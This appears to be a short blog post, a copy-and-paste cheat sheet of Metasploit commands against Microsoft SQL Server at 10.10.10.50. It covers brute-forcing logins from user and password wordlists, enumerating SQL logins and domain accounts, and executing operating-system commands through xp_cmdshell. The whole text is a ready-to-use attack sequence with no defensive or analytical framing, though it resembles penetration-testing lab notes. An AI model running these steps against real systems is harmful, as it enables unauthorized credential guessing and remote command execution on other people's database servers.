Home metasploit mssql command & paste
Post
Cancel

metasploit mssql command & paste

#msfconsole -q
msf> use auxiliary/scanner/mssql/mssql_login
msf> set RHOSTS 10.10.10.50
msf> set USER_FILE /root/Desktop/wordlist/list_of_users.txt
msf> set PASS_FILE /root/Desktop/wordlist/list_of_passwords.txt
msf> set VERBOSE false
msf> exploit

Enumerating logins:

#msfconsole -q
msf> use auxiliary/admin/mssql/mssql_enum_sql_logins
msf> set RHOSTS 10.10.10.50
msf> exploit

Enumerating all targets machine accounts:

#msfconsole -q
msf> use auxiliary/admin/mssql/mssql_enum_domain_account
msf> set RHOSTS 10.10.10.50
msf> exploit

Commands via xp_cmdshell:

#msfconsole -q
msf> use auxiliary/admin/mssql/mssql_exec
msf> set RHOSTS 10.10.10.50
msf> set CMD whoami
msf> exploit
This post is licensed under CC BY 4.0 by the author.